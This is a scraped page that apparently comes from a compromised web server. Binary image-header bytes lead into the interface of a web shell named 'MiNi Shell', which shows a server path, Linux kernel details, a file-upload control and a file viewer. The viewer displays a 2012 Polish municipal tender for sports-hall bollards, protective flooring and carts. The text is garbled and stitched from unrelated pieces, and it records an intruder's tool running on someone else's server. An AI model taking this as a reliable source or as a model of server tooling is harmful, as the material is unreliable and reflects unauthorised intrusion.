JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120105/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120105/5830-N-2012.html

<p class="kh_header"><b>Kobierzyce: Dostawa wyposażenia Hali sportowo - widowiskowej w Kobierzycach z podziałem na zadania:
I.	 Dostawa słupków odgradzających.
II.	Dostawa wykładziny ochronnej wraz z wózkami do transportu.</b><br>
<b>Numer ogłoszenia: 5830 - 2012; data zamieszczenia: 05.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Kobierzyce , al. Pałacowa 1, 55-040 Kobierzyce, woj. dolnośląskie, tel. 071 3111215, faks 071 3111252.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ugk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa wyposażenia Hali sportowo - widowiskowej w Kobierzycach z podziałem na zadania:
I.	 Dostawa słupków odgradzających.
II.	Dostawa wykładziny ochronnej wraz z wózkami do transportu..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest dostawa wyposażenia Hali sportowo - widowiskowej w Kobierzycach z podziałem na zadania:
Część I  Dostawa słupków odgradzających
Część II Dostawa wykładziny ochronnej wraz z wózkami do transportu.

Zamawiający dopuszcza możliwość składania ofert częściowych tj. zgodnie z przyjętym podziałem na części 1 i 2. Wykonawcy mogą składać ofertę na dostawę wszystkich., lub dowolnie wybranych części zamówienia. 

2.	Szczegółowy opis przedmiotu zamówienia: 
a) Część I  Dostawa słupków odgradzających na potrzeby hali sportowo - widowiskowej w Kobierzycach.
Zamówienie obejmuje dostawę: 30 szt. słupków odgradzających z taśmami łączącymi słupki, które będą wykorzystywane do wygradzania wybranych powierzchni obiektu, o następujących parametrach technicznych:
- Konstrukcja - słupek wykonany ze stali nierdzewnej polerowanej lub szczotkowanej,
- Kolor słupka - stal nierdzewna,
- Wysokość słupka  90 cm 
- Średnica rury 63 mm
- Średnica podstawy 35 cm
- Długość taśmy 2 m
- Szerokość taśmy 5 cm
- Kolor taśmy  czerwony
- Ciężar słupka 1,6 kg
- Ciężar podstawy 7,4 kg
- Możliwość mocowania taśm w czterech kierunkach (jedno gniazdo wyjściowe i trzy gniazda wejściowe) wraz z kompletnym wyposażeniem, które jest do tego mocowania przeznaczone
UWAGA: Zamawiający dopuszcza 5% odstępstwo od podanych wymiarów i ciężarów (+-5%), ale całość dostawy musi być jednakowa. Przykłady:
Zamawiający dopuszcza dostawę 30 jednakowych słupków o wysokości 91 cm i ciężarze podstawy 7.5 kg. Zamawiający nie dopuszcza dostawy 15 słupków o średnicy podstawy 35 cm i 15 słupków o średnicy podstawy 36 cm.
Załącznik do specyfikacji istotnych warunków zamówienia stanowi zdjęcie przykładowego słupka  - załącznik nr 7 do SIWZ.

b) Część II Dostawa wykładziny ochronnej wg załączonej specyfikacji w płytach o wymiarach 1m x 2m o łącznej powierzchni 1.265 m2. Dopuszcza się 10% tolerancję podanych wymiarów pojedynczej płyty, przy czym wszystkie dostarczone płyty winny mieć jednakowy wymiar oraz dostawa 4 szt. wózków do transportu ww. wykładzin.
Specyfikacja materiałowa:
1.	Wykładzina ochronna w płytach - 1 265m2. Płyty wykonane z włókniny igłowanej (100% PP) w kolorze szarym , na trwałym spodzie antypoślizgowym (polyolefin) w jasnym kolorze, gwarantującym doskonałe przyleganie do podłogi. Wykładzina niebrudząca, odporna na uszkodzenia mechaniczne. Tłumienie dźwięku 18-19dB. Odporna na ogień wg normy EN -13501-1. Wymiary płyty 1000x2000 mm, grubość całkowita co najmniej 6mm, waga 1 płyty 7,2 - 7,6kg. Minimalna wymagana waga włókna wykładziny to 500 gr/m2. Wykładzina musi gwarantować pełne zabezpieczenie podłogi sportowej w hali przed niepożądanymi czynnikami, typu: niedopałki papierosów, rozlane płyny, resztki jedzenia, nieodpowiednie obuwie (szpilki, podkute buty). 
2.	Wózek do transportu 150 płyt wykładziny ochronnej - 4 szt. Konstrukcja wózka wykonana z kształtowników stalowych zimnogiętych  40x40x2mm. Poręcz wykonana z rury stalowej ze szwem O 32x2. Całość konstrukcji (stal S 235 o gęstości 7,85gr/cm3) spawana metodą MAG i malowana proszkowo na kolor srebrny (RAL 9006). Zakończenia profili stalowych stanowią plastikowe zaślepki  w kolorze czarnym. Wózek wyposażony w 4 koła skrętne o średnicy 200mm i nośności 400kg, w tym 2 z hamulcem. Koła z tworzywa elastycznego z oprawą ze stali cynkowanej galwanicznie, przeznaczone do cichej pracy z ciężkimi ładunkami. Dopuszczalne obciążenie wózka 1200kg. Platforma wózka wykonana ze sklejki wodoodpornej i antypoślizgowej 2000x1000x18mm, w kolorze ciemnobrązowym, mocowana do konstrukcji w czterech miejscach. Śruby i nakrętki zastosowane do połączeń klasy 5.8. Gabaryty wózka: długość 2250mm +/- 10%, szerokość 1000mm +/- 10%, wysokość 1325mm +/- 10%, masa wózka 100 +/- 10kg.
Załącznik do specyfikacji materiałowej stanowi  przykładowy rysunek wózka - załącznik nr 8 do SIWZ.

3.	Oferując sprzęt i urządzenia równoważne, Wykonawca zobowiązany jest do dostarczenia do oferty stosownych dokumentów zawierających opis oraz parametry tych produktów po to, aby Zamawiający mógł ocenić, czy rzeczywiście są to produkty równoważne. W przypadku wątpliwości na Wykonawcy będzie spoczywał obowiązek udowodnienia, że oferowany sprzęt jest równoważny. W takim przypadku Wykonawca musi przedłożyć odpowiednie dokumenty opisujące parametry techniczne, wymagane prawem atesty i inne dokumenty dopuszczające dane urządzenia do użytkowania oraz pozwalające jednoznacznie stwierdzić, iż są one równoważne. 
4.	Wykonawca musi zapewnić dostawę przedmiotu zamówienia na adres wskazany przez Zamawiającego tj. do Hali Sportowej w Kobierzycach przy ul. Dębowej 20. O terminie dostarczenia przedmiotu zamówienia Wykonawca zawiadomi Zamawiającego z trzydniowym wyprzedzeniem..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>zgodnie z art 67 ustawy PZP</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 37.45.10.10-4, 37.40.00.00-2, 37.45.29.10-3, 34.91.11.00-7, 39.53.20.00-0, 39.53.14.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie powyższego warunku Zamawiający uzna wykazanie wykonanej w okresie ostatnich 3 lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie; dostaw (zbieżnej z przedmiotem zamówienia) oraz załączeniem dokumentów (referencji) potwierdzających, że ww. dostawa została wykonana należycie. 
Minimalne wymaganie spełnienia warunku to udokumentowanie:
Dla II części zamówienia:
2 porównywalnych dostaw, za zamówienie porównywalne przyjmuje się dostawę wykładziny ochronnej o powierzchni minimum 600m2 dla każdej z wykazanych referencji</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie powyższego warunku Zamawiający uzna posiadanie opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego, Wykonawca winien załączyć do oferty przetargowej  następujące dokumenty:
Dla oferowanej wykładziny (II część):
- próbkę oferowanej wykładziny w wymiarach 1 płyty,
- kartę techniczną,
- kopię atestu p. poż.,
- kopię atestu higienicznego.
Dla oferowanego słupka (I część):
- załącznik graficzny przedstawiający oferowany asortyment z dokładnym podanie parametrów technicznych.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>zgodnie z pkt XIII SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ugk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Kobierzyce, Al. Pałacowa 1, 55-040 Kobierzyce, pok. 50.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.01.2012 godzina 12:00, miejsce: Urząd Gminy Kobierzyce, Al. Pałacowa 1, 55-040 Kobierzyce, pok 25.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> n/d.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I  Dostawa słupków odgradzających.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część I  Dostawa słupków odgradzających na potrzeby hali sportowo - widowiskowej w Kobierzycach.
Zamówienie obejmuje dostawę: 30 szt. słupków odgradzających z taśmami łączącymi słupki, które będą wykorzystywane do wygradzania wybranych powierzchni obiektu, o następujących parametrach technicznych:
- Konstrukcja - słupek wykonany ze stali nierdzewnej polerowanej lub szczotkowanej,
- Kolor słupka - stal nierdzewna,
- Wysokość słupka  90 cm 
- Średnica rury 63 mm
- Średnica podstawy 35 cm
- Długość taśmy 2 m
- Szerokość taśmy 5 cm
- Kolor taśmy  czerwony
- Ciężar słupka 1,6 kg
- Ciężar podstawy 7,4 kg
- Możliwość mocowania taśm w czterech kierunkach (jedno gniazdo wyjściowe i trzy gniazda wejściowe) wraz z kompletnym wyposażeniem, które jest do tego mocowania przeznaczone
UWAGA: Zamawiający dopuszcza 5% odstępstwo od podanych wymiarów i ciężarów (+-5%), ale całość dostawy musi być jednakowa. Przykłady:
Zamawiający dopuszcza dostawę 30 jednakowych słupków o wysokości 91 cm i ciężarze podstawy 7.5 kg. Zamawiający nie dopuszcza dostawy 15 słupków o średnicy podstawy 35 cm i 15 słupków o średnicy podstawy 36 cm.
Załącznik do specyfikacji istotnych warunków zamówienia stanowi zdjęcie przykładowego słupka  - załącznik nr 7 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 37.45.10.10-4, 37.45.29.10-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II Dostawa wykładziny ochronnej wraz z wózkami do transportu..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część II Dostawa wykładziny ochronnej wg załączonej specyfikacji w płytach o wymiarach 1m x 2m o łącznej powierzchni 1.265 m2. Dopuszcza się 10% tolerancję podanych wymiarów pojedynczej płyty, przy czym wszystkie dostarczone płyty winny mieć jednakowy wymiar oraz dostawa 4 szt. wózków do transportu ww. wykładzin.
Specyfikacja materiałowa:
1.	Wykładzina ochronna w płytach - 1 265m2. Płyty wykonane z włókniny igłowanej (100% PP) w kolorze szarym , na trwałym spodzie antypoślizgowym (polyolefin) w jasnym kolorze, gwarantującym doskonałe przyleganie do podłogi. Wykładzina niebrudząca, odporna na uszkodzenia mechaniczne. Tłumienie dźwięku 18-19dB. Odporna na ogień wg normy EN -13501-1. Wymiary płyty 1000x2000 mm, grubość całkowita co najmniej 6mm, waga 1 płyty 7,2 - 7,6kg. Minimalna wymagana waga włókna wykładziny to 500 gr/m2. Wykładzina musi gwarantować pełne zabezpieczenie podłogi sportowej w hali przed niepożądanymi czynnikami, typu: niedopałki papierosów, rozlane płyny, resztki jedzenia, nieodpowiednie obuwie (szpilki, podkute buty). 
2.	Wózek do transportu 150 płyt wykładziny ochronnej - 4 szt. Konstrukcja wózka wykonana z kształtowników stalowych zimnogiętych  40x40x2mm. Poręcz wykonana z rury stalowej ze szwem O 32x2. Całość konstrukcji (stal S 235 o gęstości 7,85gr/cm3) spawana metodą MAG i malowana proszkowo na kolor srebrny (RAL 9006). Zakończenia profili stalowych stanowią plastikowe zaślepki  w kolorze czarnym. Wózek wyposażony w 4 koła skrętne o średnicy 200mm i nośności 400kg, w tym 2 z hamulcem. Koła z tworzywa elastycznego z oprawą ze stali cynkowanej galwanicznie, przeznaczone do cichej pracy z ciężkimi ładunkami. Dopuszczalne obciążenie wózka 1200kg. Platforma wózka wykonana ze sklejki wodoodpornej i antypoślizgowej 2000x1000x18mm, w kolorze ciemnobrązowym, mocowana do konstrukcji w czterech miejscach. Śruby i nakrętki zastosowane do połączeń klasy 5.8. Gabaryty wózka: długość 2250mm +/- 10%, szerokość 1000mm +/- 10%, wysokość 1325mm +/- 10%, masa wózka 100 +/- 10kg.
Załącznik do specyfikacji materiałowej stanowi  przykładowy rysunek wózka - załącznik nr 8 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 37.45.10.10-4, 37.40.00.00-2, 37.45.29.10-3, 34.91.11.00-7, 39.53.20.00-0, 39.53.14.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 45.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com